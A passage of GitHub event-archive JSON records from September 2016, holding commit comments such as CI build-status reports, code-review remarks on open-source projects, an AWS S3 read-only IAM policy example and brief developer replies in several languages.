href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.0%25-red.svg)</a> \n"}},"created_at":"2016-09-09T18:41:00Z"}
{"id":"4541705421","type":"CommitCommentEvent","actor":{"login":"oelry"},"repo":{"name":"oelry/oelry.github.io"},"payload":{"comment":{"id":18967573,"position":13,"line":28,"path":"index.html","commit_id":"b95674e58b490aef81392192153485c8fb711f07","created_at":"2016-09-09T18:41:24Z","updated_at":"2016-09-09T18:41:24Z","body":"I like auto!"}},"created_at":"2016-09-09T18:41:24Z"}
{"id":"4541705983","type":"CommitCommentEvent","actor":{"login":"Mickydtron"},"repo":{"name":"Mickydtron/IronFire"},"payload":{"comment":{"id":18967574,"position":null,"line":null,"path":null,"commit_id":"5c9827deb3021fe3cbce053feacb1468f13c5703","created_at":"2016-09-09T18:41:30Z","updated_at":"2016-09-09T18:41:30Z","body":"fixes #17 "}},"created_at":"2016-09-09T18:41:30Z"}
{"id":"4541707956","type":"CommitCommentEvent","actor":{"login":"oelry"},"repo":{"name":"oelry/oelry.github.io"},"payload":{"comment":{"id":18967578,"position":11,"line":26,"path":"index.html","commit_id":"b95674e58b490aef81392192153485c8fb711f07","created_at":"2016-09-09T18:41:52Z","updated_at":"2016-09-09T18:41:52Z","body":"`window`! `document`!"}},"created_at":"2016-09-09T18:41:52Z"}
{"id":"4541709290","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18967582,"position":null,"line":null,"path":null,"commit_id":"246a3d849e094d79b60385163671aa112f38eaca","created_at":"2016-09-09T18:42:08Z","updated_at":"2016-09-09T18:42:08Z","body":"Ссылки по теме алгоритмической сложности:\r\nhttps://habrahabr.ru/post/196560/\r\nhttp://www.diary.ru/~Organon/p44753547.htm?oam#more1\r\n"}},"created_at":"2016-09-09T18:42:08Z"}
{"id":"4541713231","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":18967595,"position":14,"line":172,"path":"ltac/profile_ltac.ml","commit_id":"1f358573df98358237b9af2a3ff48c99d8be0686","created_at":"2016-09-09T18:42:52Z","updated_at":"2016-09-09T18:42:52Z","body":"So what purpose does that serve?  There are newlines from `fnl ()`, but no line-break hints.  If you do `v 0 (str \"a\") ++ v 0 (str \"b\")`, does that force them onto separate lines?  (I guess this is what's responsible for the strange indentation of a large block, when there's a missing newline...)"}},"created_at":"2016-09-09T18:42:52Z"}
{"id":"4541715915","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18967603,"position":null,"line":null,"path":null,"commit_id":"808b53d14d929f7b3bde40a676d3a4e3ac2202cb","created_at":"2016-09-09T18:43:22Z","updated_at":"2016-09-09T18:43:22Z","body":"这里新截取的这个机器前面板把说明书给挡住了...\r\n物体的放置还是直接用个tween动画让他落下去比较好，不然比较小的物体放开后能看出来是悬浮着的。\r\n（鼠标松开时物体整体变暗并出现在舱室内区域，就是物体上边缘低于舱门上边缘的地方，然后开始下落动作）"}},"created_at":"2016-09-09T18:43:22Z"}
{"id":"4541724873","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18967627,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-09T18:45:09Z","updated_at":"2016-09-09T18:45:09Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-09T18:45:09Z"}
{"id":"4541728910","type":"CommitCommentEvent","actor":{"login":"tomwanzek"},"repo":{"name":"tomwanzek/d3-ng2-demo"},"payload":{"comment":{"id":18967639,"position":null,"line":null,"path":null,"commit_id":"d479c8c3b294076630b35fd8529b456e3bdb21e1","created_at":"2016-09-09T18:45:56Z","updated_at":"2016-09-09T18:45:56Z","body":"@mbostock\r\nHi Mike,\r\n\r\nHope you had a great summer. After some extensive work on the TypeScript 2 definitions for D3 v4, I thought, it might be a good idea to have brief demo app for people who want to enjoy all the goodness of your D3 wrapped into light coating of Angular 2. :smile:\r\n\r\nThe demo app with accompanying repo is intended as an exploration/(self-)learning tool.\r\n\r\nA live prototype version is on the following Github Page: [d3-ng2-demo](https://tomwanzek.github.io/d3-ng2-demo/). (Clearly the prototype needs some work on the intro section.) \r\n\r\nThe source repo is here: [d3-ng2-demo repo](https://github.com/tomwanzek/d3-ng2-demo). (The Readme is still mostly boilerplate from angular-cli.)\r\n\r\nThe reason I am @ mentioning you with this comment, is two-fold.\r\n\r\nFor one, as innumerable people have benefited in the past from your Blocks examples, I have chosen to adapt three of them into Angular 2 components (cross-referenced to your originals, for didactic comparison as well). With Angular 2, D3v4 and TypeScript2 fresh out of the gate some sense of steadiness from a well-defined reference point just felt right. So I wanted to pass this approach by you. I sincerely hope you're alright with the underlying philosophy.\r\n\r\nSecondly, I intend to link it in the D3 wiki, I thought under Tutorials might be a spot for D3v4 Angular 2.\r\n\r\nSo, I would be grateful for your take on the matter!!! Cheers.\r\n"}},"created_at":"2016-09-09T18:45:56Z"}
{"id":"4541729779","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18967646,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-09T18:46:07Z","updated_at":"2016-09-09T18:46:07Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T18:46:07Z"}
{"id":"4541734911","type":"CommitCommentEvent","actor":{"login":"logic-dev"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18967670,"position":null,"line":null,"path":null,"commit_id":"400367753f7c63152a72562188154f82acaaa253","created_at":"2016-09-09T18:47:08Z","updated_at":"2016-09-09T18:47:08Z","body":"Bugger, forgot to rebase before pusing"}},"created_at":"2016-09-09T18:47:08Z"}
{"id":"4541741905","type":"CommitCommentEvent","actor":{"login":"mwalkerwells"},"repo":{"name":"gcanti/flow-static-land"},"payload":{"comment":{"id":18967686,"position":87,"line":107,"path":"README.md","commit_id":"16a84aad3825cfe34868e87665677a29d18f8a1e","created_at":"2016-09-09T18:48:34Z","updated_at":"2016-09-09T18:48:34Z","body":"If I'm using this in my project, is there any reason I need to A) tell Flow to type check entire library (via [Include]) or B) include the entire library when I compile my bundle (via Babel)?\r\n\r\nMostly, I just want access to types when I import things from the library."}},"created_at":"2016-09-09T18:48:34Z"}
{"id":"4541746382","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18967695,"position":62,"line":147,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-09T18:49:26Z","updated_at":"2016-09-09T18:49:26Z","body":"Ah, OK, thanks -- I misread it."}},"created_at":"2016-09-09T18:49:26Z"}
{"id":"4541746987","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18967697,"position":null,"line":null,"path":null,"commit_id":"86ac50efcf0751a78ec07a71a80ae4c808df0001","created_at":"2016-09-09T18:49:34Z","updated_at":"2016-09-09T18:49:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SGt_vwadScmImYcnhpbOJg"}},"created_at":"2016-09-09T18:49:34Z"}
{"id":"4541747141","type":"CommitCommentEvent","actor":{"login":"mycrobe"},"repo":{"name":"warelab/gramene-genetree-vis"},"payload":{"comment":{"id":18967698,"position":null,"line":null,"path":null,"commit_id":"0bb8aae36ff0b940e611183f517a8c51e2171a51","created_at":"2016-09-09T18:49:35Z","updated_at":"2016-09-09T18:49:35Z","body":"We could add this back again now that we're ready use this functionality."}},"created_at":"2016-09-09T18:49:35Z"}
{"id":"4541747234","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967699,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:49:36Z","updated_at":"2016-09-09T18:49:36Z","body":"I don't actually see the lua files in the repo, however. Mind reuploading them?"}},"created_at":"2016-09-09T18:49:36Z"}
{"id":"4541751404","type":"CommitCommentEvent","actor":{"login":"mliudev"},"repo":{"name":"nimbis/django-shop-richcatalog"},"payload":{"comment":{"id":18967710,"position":null,"line":null,"path":null,"commit_id":"58899170d2466ee0e5c3a1dcf884e521fcf764e1","created_at":"2016-09-09T18:50:27Z","updated_at":"2016-09-09T18:50:27Z","body":"This is likely to cause problems when we want to move to Django 1.9. Is there a card to investigate this?"}},"created_at":"2016-09-09T18:50:27Z"}
{"id":"4541752276","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18967714,"position":null,"line":null,"path":null,"commit_id":"246a3d849e094d79b60385163671aa112f38eaca","created_at":"2016-09-09T18:50:38Z","updated_at":"2016-09-09T18:50:38Z","body":"Спасибо!\r\n"}},"created_at":"2016-09-09T18:50:38Z"}
{"id":"4541753240","type":"CommitCommentEvent","actor":{"login":"cemsbr"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18967715,"position":null,"line":null,"path":null,"commit_id":"61c8cdf800f5624259b93221c851af4fcc2797af","created_at":"2016-09-09T18:50:50Z","updated_at":"2016-09-09T18:50:50Z","body":"Because of this, I filed #165."}},"created_at":"2016-09-09T18:50:50Z"}
{"id":"4541756548","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18967726,"position":62,"line":147,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-09T18:51:29Z","updated_at":"2016-09-09T18:51:29Z","body":"But note that hook return values are important; callback functions should return `false` to permit the hook to continue processing (e.g. by other registrants), or `true` to interrupt hook processing. Check hook callbacks throughout this plugin to make sure they're returning something -- in this case `false` would be appropriate, for example."}},"created_at":"2016-09-09T18:51:29Z"}
{"id":"4541758592","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18967734,"position":null,"line":null,"path":null,"commit_id":"0889c5a3d2ea81464bccbe7241155ccc6384c163","created_at":"2016-09-09T18:51:53Z","updated_at":"2016-09-09T18:51:53Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0889c5a3d2ea81464bccbe7241155ccc6384c163-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0889c5a3d2ea81464bccbe7241155ccc6384c163-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T18:51:53Z"}
{"id":"4541761221","type":"CommitCommentEvent","actor":{"login":"semiautomaticgit"},"repo":{"name":"semiautomaticgit/SemiAutomaticClassificationPlugin"},"payload":{"comment":{"id":18967743,"position":null,"line":null,"path":null,"commit_id":"340ba9a2fa6379ab8035e7004fda5c6488fc1646","created_at":"2016-09-09T18:52:26Z","updated_at":"2016-09-09T18:52:26Z","body":"Thank you very much, I have added this in version 5.0.5"}},"created_at":"2016-09-09T18:52:26Z"}
{"id":"4541764528","type":"CommitCommentEvent","actor":{"login":"amadornimbis"},"repo":{"name":"nimbis/django-shop-richcatalog"},"payload":{"comment":{"id":18967751,"position":null,"line":null,"path":null,"commit_id":"58899170d2466ee0e5c3a1dcf884e521fcf764e1","created_at":"2016-09-09T18:53:05Z","updated_at":"2016-09-09T18:53:05Z","body":"Probably not for this problem _specifically_, but there should be one for replacing django-shop (which is one of the major things preventing us from moving past Django 1.8. In any case, I'll make sure one exists now. It was already the case that this app depended on Django<1.9, it just wasn't enforced by the setup.py"}},"created_at":"2016-09-09T18:53:05Z"}
{"id":"4541767449","type":"CommitCommentEvent","actor":{"login":"mdiep"},"repo":{"name":"ReactiveCocoa/ReactiveCocoa"},"payload":{"comment":{"id":18967755,"position":null,"line":null,"path":null,"commit_id":"8d5f963f0705c849b9574fcdd5033426be16b3d8","created_at":"2016-09-09T18:53:38Z","updated_at":"2016-09-09T18:53:38Z","body":"I think the deployment targets are needed."}},"created_at":"2016-09-09T18:53:38Z"}
{"id":"4541770737","type":"CommitCommentEvent","actor":{"login":"nalipaz"},"repo":{"name":"rocketeers/rocketeer"},"payload":{"comment":{"id":18967764,"position":19,"line":144,"path":"src/Rocketeer/Services/Connections/Credentials/CredentialsGatherer.php","commit_id":"927702ae49ed66aa2747c3bdeda79721c09a3ca2","created_at":"2016-09-09T18:54:20Z","updated_at":"2016-09-09T18:54:20Z","body":"\r\n\r\n![LGTM](https://lgtm.in/p/oyl2NiELn)"}},"created_at":"2016-09-09T18:54:20Z"}
{"id":"4541774342","type":"CommitCommentEvent","actor":{"login":"lwouis"},"repo":{"name":"joffrey-bion/fx-log"},"payload":{"comment":{"id":18967773,"position":null,"line":null,"path":null,"commit_id":"0e53e6e2e8c84e3020cf05ff4f51a10af8d51e53","created_at":"2016-09-09T18:55:00Z","updated_at":"2016-09-09T18:55:00Z","body":"Please consider using the icon I provided at work. It's easily 10x cooler."}},"created_at":"2016-09-09T18:55:00Z"}
{"id":"4541774807","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18967776,"position":null,"line":null,"path":null,"commit_id":"ec4dba1f0e96caeea412f1bd52d6d3a02e356a9f","created_at":"2016-09-09T18:55:07Z","updated_at":"2016-09-09T18:55:07Z","body":"As indicated in the commit, here's the sample screenshot:\r\n![screenshot-1](https://cloud.githubusercontent.com/assets/1862162/18399046/2da624e8-7684-11e6-939d-e29f0cc339e7.png)\r\n"}},"created_at":"2016-09-09T18:55:07Z"}
{"id":"4541776677","type":"CommitCommentEvent","actor":{"login":"aldin"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18967785,"position":9,"line":82,"path":"application/model/common_module/update/base_service.rb","commit_id":"665f79b60c953bc543a8e96104d1f9a3b344bd0e","created_at":"2016-09-09T18:55:27Z","updated_at":"2016-09-09T18:55:27Z","body":"Not sure if this line will create new branch on git level along with creating branch in object model (don't remember clearly but I think this is the reason I used RepoManager.add_branch_and_push?(module_branch[:branch], {}, base_branch) as well). Will need to double check.\r\nNote: when new version of module is installed we need, on git level and in object model, to create new branch for common module and for service module as well."}},"created_at":"2016-09-09T18:55:27Z"}
{"id":"4541778292","type":"CommitCommentEvent","actor":{"login":"denofevil"},"repo":{"name":"ruby-debug/ruby-debug-ide"},"payload":{"comment":{"id":18967798,"position":5,"line":9,"path":"bin/gdb_wrapper","commit_id":"cede1279387a54c42002b5a5eb623173f29baaf8","created_at":"2016-09-09T18:55:46Z","updated_at":"2016-09-09T18:55:46Z","body":"Does this really needs to be a global variable? I think local one should be enough.\r\nProbably this is also true for all other variables here"}},"created_at":"2016-09-09T18:55:46Z"}
{"id":"4541781424","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18967808,"position":49,"line":2034,"path":"src/core/simplefilters.c","commit_id":"0d474ff3cf0794584098b224b3a97a3c5c254ac9","created_at":"2016-09-09T18:56:24Z","updated_at":"2016-09-09T18:56:24Z","body":"What about the extra bytes at the right edge?"}},"created_at":"2016-09-09T18:56:24Z"}
{"id":"4541781719","type":"CommitCommentEvent","actor":{"login":"balgaly"},"repo":{"name":"matanaa/maze"},"payload":{"comment":{"id":18967810,"position":11,"line":11,"path":"MyAlgorithm/src/Boot/run.java","commit_id":"d8c55b2f189182d5f5741fee4c69a421110c7e9a","created_at":"2016-09-09T18:56:28Z","updated_at":"2016-09-09T18:56:28Z","body":"khjkj"}},"created_at":"2016-09-09T18:56:28Z"}
{"id":"4541784703","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967822,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:57:07Z","updated_at":"2016-09-09T18:57:07Z","body":"Okay which ones are you missing?"}},"created_at":"2016-09-09T18:57:07Z"}
{"id":"4541787919","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967833,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:57:46Z","updated_at":"2016-09-09T18:57:46Z","body":"The CP/CBO ones."}},"created_at":"2016-09-09T18:57:46Z"}
{"id":"4541789411","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18967835,"position":36,"line":2021,"path":"src/core/simplefilters.c","commit_id":"0d474ff3cf0794584098b224b3a97a3c5c254ac9","created_at":"2016-09-09T18:58:05Z","updated_at":"2016-09-09T18:58:05Z","body":"mmin and fmmin should start with 255 and FLT_MAX, no?"}},"created_at":"2016-09-09T18:58:05Z"}
{"id":"4541789882","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18967836,"position":17,"line":14,"path":".editorconfig","commit_id":"d1600bdbb4deb4ba28ba2aac4d5ad4441be5adeb","created_at":"2016-09-09T18:58:11Z","updated_at":"2016-09-09T18:58:11Z","body":"Usually, one would want to introduce a new `<br />` without having to introduce a new `p` at all.\r\n\r\nThis increases readability for me,\r\nsince I usually hit <kbd>enter</kbd> to avoid exceeding a max length in my files and `'  '` if I want a new line\r\n"}},"created_at":"2016-09-09T18:58:11Z"}
{"id":"4541793001","type":"CommitCommentEvent","actor":{"login":"myrsloik"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18967846,"position":49,"line":2034,"path":"src/core/simplefilters.c","commit_id":"0d474ff3cf0794584098b224b3a97a3c5c254ac9","created_at":"2016-09-09T18:58:49Z","updated_at":"2016-09-09T18:58:49Z","body":"They're included and fine?"}},"created_at":"2016-09-09T18:58:49Z"}
{"id":"4541793257","type":"CommitCommentEvent","actor":{"login":"willglynn"},"repo":{"name":"sourcegraph/checkup"},"payload":{"comment":{"id":18967848,"position":null,"line":null,"path":null,"commit_id":"df3a626c9226c0d4a8f1291b5d2ff3e676aa5062","created_at":"2016-09-09T18:58:52Z","updated_at":"2016-09-09T18:58:52Z","body":"It is. I'd probably go for an [inline policy](http://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-vs-inline.html) on the IAM user, which can be created via [`iam:PutUserPolicy`](http://docs.aws.amazon.com/IAM/latest/APIReference/API_PutUserPolicy.html) ([godoc](http://docs.aws.amazon.com/sdk-for-go/api/service/iam/#IAM.PutUserPolicy)). Policy document would look something like:\r\n\r\n```\r\n{\r\n  \"Version\": \"2012-10-17\",\r\n  \"Statement\": [\r\n    {\r\n      \"Action\": [ \"s3:ListBucket\", \"s3:GetObject\" ],\r\n      \"Effect\": \"Allow\",\r\n      \"Resource\": [ \"arn:aws:s3:::my-checkup-bucket\", \"arn:aws:s3:::my-checkup-bucket/*\" ]\r\n    }\r\n  ]\r\n}\r\n```"}},"created_at":"2016-09-09T18:58:52Z"}
{"id":"4541807659","type":"CommitCommentEvent","actor":{"login":"shickey"},"repo":{"name":"Foo-Bear/beartime-web"},"payload":{"comment":{"id":18967887,"position":5,"line":5,"path":"Credits.md","commit_id":"c54ef761dd491f5b5bce96e50b25f84dbedc0308","created_at":"2016-09-09T19:01:39Z","updated_at":"2016-09-09T19:01:39Z","body":"\"Bearstatus\" -> \"BearStatus\""}},"created_at":"2016-09-09T19:01:39Z"}
{"id":"4541807671","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967888,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T19:01:39Z","updated_at":"2016-09-09T19:01:39Z","body":"https://github.com/Iamblichos/Community-Patch-DLL/tree/master/Community%2520Patch/LUA\r\n\r\nhttps://github.com/Iamblichos/Community-Patch-DLL/tree/master/Community%2520Balance%2520Patch/LUA\r\n\r\nI'm not sure why GitHub made brand new directories for this....annoying.\r\n"}},"created_at":"2016-09-09T19:01:39Z"}
{"id":"4541808937","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18967895,"position":null,"line":null,"path":null,"commit_id":"8f0ce5b4377aaf37ef19a6ac558c2151167022f9","created_at":"2016-09-09T19:01:55Z","updated_at":"2016-09-09T19:01:55Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 424](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1181&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-09T19:01:55Z"}
{"id":"4541810863","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967897,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T19:02:15Z","updated_at":"2016-09-09T19:02:15Z","body":"ohhh I see. okay I'll fix. Looks like a naming issue."}},"created_at":"2016-09-09T19:02:15Z"}
{"id":"4541815189","type":"CommitCommentEvent","actor":{"login":"dmiller-nmap"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18967909,"position":13,"line":23,"path":"installer/Deploy.ps1","commit_id":"d99a3ceaef5412688e1ec71872c4a32b29f9a23f","created_at":"2016-09-09T19:03:08Z","updated_at":"2016-09-09T19:03:08Z","body":"@techtonik @hsluoyz Seems to be ok: https://security.stackexchange.com/questions/62420/is-code-signing-with-a-non-ssl-timestamp-unsafe"}},"created_at":"2016-09-09T19:03:08Z"}
{"id":"4541819030","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18967915,"position":null,"line":null,"path":null,"commit_id":"8f0ce5b4377aaf37ef19a6ac558c2151167022f9","created_at":"2016-09-09T19:03:54Z","updated_at":"2016-09-09T19:03:54Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 424](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1181&buildTypeId=XbimEssentials_XbimEssentials) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:58"}},"created_at":"2016-09-09T19:03:54Z"}
{"id":"4541822093","type":"CommitCommentEvent","actor":{"login":"genehack"},"repo":{"name":"atoomic/Git-Wrapper"},"payload":{"comment":{"id":18967924,"position":null,"line":null,"path":null,"commit_id":"39efb579d72c8eabf8f7ba45f95c927aa5b69168","created_at":"2016-09-09T19:04:34Z","updated_at":"2016-09-09T19:04:34Z","body":"thanks, this'll work. will pull in tonight. "}},"created_at":"2016-09-09T19:04:34Z"}
{"id":"4541830010","type":"CommitCommentEvent","actor":{"login":"R41z"},"repo":{"name":"drkh5h/slstatus"},"payload":{"comment":{"id":18967958,"position":null,"line":null,"path":null,"commit_id":"f6f8963c8c67e8678017a0e8b8d58bb281adc2d8","created_at":"2016-09-09T19:06:07Z","updated_at":"2016-09-09T19:06:07Z","body":"weed mate, weed."}},"created_at":"2016-09-09T19:06:07Z"}
{"id":"4541831386","type":"CommitCommentEvent","actor":{"login":"shickey"},"repo":{"name":"Foo-Bear/beartime-web"},"payload":{"comment":{"id":18967963,"position":null,"line":null,"path":null,"commit_id":"c54ef761dd491f5b5bce96e50b25f84dbedc0308","created_at":"2016-09-09T19:06:23Z","updated_at":"2016-09-09T19:06:23Z","body":"Line 15: \"BearStatus was created by...\" -> \"The original version of BearStatus was created by...\"\r\n\r\nAlso: \"Continuing development...by Ben Weinshel and Jason Shu\" -> replace the whole sentence with \"The project was maintained by Ben Weinshel '15 and Jason Shu '15\""}},"created_at":"2016-09-09T19:06:23Z"}
{"id":"4541833260","type":"CommitCommentEvent","actor":{"login":"dodgepong"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18967969,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-09T19:06:44Z","updated_at":"2016-09-09T19:06:44Z","body":"I'm going to give you the benefit of the doubt and assume that you genuinely don't understand what the scene switcher is for, because your comments are not making any sense whatsoever.\r\n\r\nThe auto-scene switcher is a tool that streamers can use to define conditions under which certain scenes should be displayed. For example, let's say you're playing League of Legends. LoL has a \"launcher\" window that is separate from the actual game window, so you might have a scene that shows things while you are in the launcher, and a scene that has things arranged while you are in-game. You might go back and forth between these scenes several times over the course of a stream, and it's annoying to have to remember to switch manually.\r\n\r\nThe auto-scene switcher can detect what the currently active window is, and you can set it up so that if you're using the launcher, it will display the Launcher scene, and if you're in game, it will display the In-game scene. It can do this without any input from the streamer, leaving them to worry about playing the game and entertaining the audience rather than fiddling with stream production. It's an ease-of-use tool that many streamers find very helpful for producing their streams.\r\n\r\nIt's not a replacement for the existing scene-switching capabilities, nor does it hide control/information from users in any way. Everything still appears as it always did, but now you have the option to say \"If X window is selected, show scene Y\". That's it."}},"created_at":"2016-09-09T19:06:44Z"}
{"id":"4541834356","type":"CommitCommentEvent","actor":{"login":"DiegoAccorinti"},"repo":{"name":"hugoruscitti/pilas"},"payload":{"comment":{"id":18967973,"position":20,"line":155,"path":"pilasengine/__init__.py","commit_id":"18f85494ed40f6c759f3736398f98010253502bc","created_at":"2016-09-09T19:07:00Z","updated_at":"2016-09-09T19:07:00Z","body":"Si el audio ya está activado, e intento forzar la activación por las dudas de que esté desactivado, sale por consola el mensaje \"Error, el audio ya ha sido inicializado\"  y en realidad no hay error,  solo que intento activarlo y ya está activado.   El mensaje debería ser \"El audio se encuentra inicializado.\"\r\nLa palabra error crea la sensación de que algo no anda bien, cuando todo está ok."}},"created_at":"2016-09-09T19:07:00Z"}
{"id":"4541835895","type":"CommitCommentEvent","actor":{"login":"srt32"},"repo":{"name":"globality-corp/microcosm-pubsub"},"payload":{"comment":{"id":18967977,"position":13,"line":64,"path":"microcosm_pubsub/consumer.py","commit_id":"557d284b55709d7fd4856a97acee3c55b5792949","created_at":"2016-09-09T19:07:18Z","updated_at":"2016-09-09T19:07:18Z","body":"is `visibility_timeout_second` singular on purpose?"}},"created_at":"2016-09-09T19:07:18Z"}
{"id":"4541838980","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18967985,"position":null,"line":null,"path":null,"commit_id":"3b672492f38cc378fe86ee7e248eb70522ab142f","created_at":"2016-09-09T19:07:57Z","updated_at":"2016-09-09T19:07:57Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 425](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1182&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-09T19:07:57Z"}
